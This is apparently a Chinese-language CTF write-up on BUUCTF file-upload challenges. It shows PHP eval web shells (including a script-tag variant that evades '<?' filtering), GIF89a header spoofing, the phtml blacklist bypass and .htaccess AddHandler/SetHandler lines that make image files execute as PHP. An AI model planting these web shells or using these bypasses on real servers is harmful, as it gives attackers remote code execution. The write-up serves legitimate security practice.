BUU-upload实战

——————————-在经历upload-labs后,我刷不明白,决定直接去实战试试看——————————-

[极客大挑战 2019]Upload

由于是第一次做upload,于是便主要是搜为主

要考察的四个点:

1
2
3
4
5
6
1.MIME类型(Content-Type: image/png)
2.文件头(GIF89a)
3.黑名单检测(phtml)
4.检测<?(`<script language="pHp">@eval($_POST['cmd'])</script>`)
<?php @eval($_POST['cmd']);?>
5.找到根目录
1.MIME类型(Content-Type: image/png):

抓包后记得改一下就行

image-20250221155507349

2.文件头(GIF89a)与黑名单检测(phtml):

当我们上传文件改为php时,会发现php被禁止,我们爆破一下看看php3/5之类的彳亍不彳亍

image-20250221155804565

发现phtml可以,那就使用这个,但是还是无法识别,那我们就在头部加上:GIF89aimage-20250221155950560

3.检测<?:

我们会发现,他说检测到了<?那我们就用古老的解析方法来绕过:

1
<script language="pHp">@eval($_POST['sb'])</script>

于是,便正常上传了

4.找到根目录

837d2f1b2eedb0644efc7eaeb1a2a95c

在这里进行爆破(抓的是没有上传文件的刷新页面)

[ACTF2020 新生赛]Upload

和上面思路差不多

[MRCTF2020]你传你🐎呢(使用.htaccess配置文件)

尝试普通upload上传发现不行php什么的全被转义了,折磨自己许久,发现只能看答案咯(

前面的上传都是差不多的(不需要上传php文件,只要能上传的文件都行———jpg/inc),后面再上传一个.htaccess,写入

1
2
3
INC文件:AddHandler application/x-httpd-php .inc
PHP文件:AddHandler application/x-httpd-php .jpg
所有文件:SetHandler application/x-httpd-php
backtop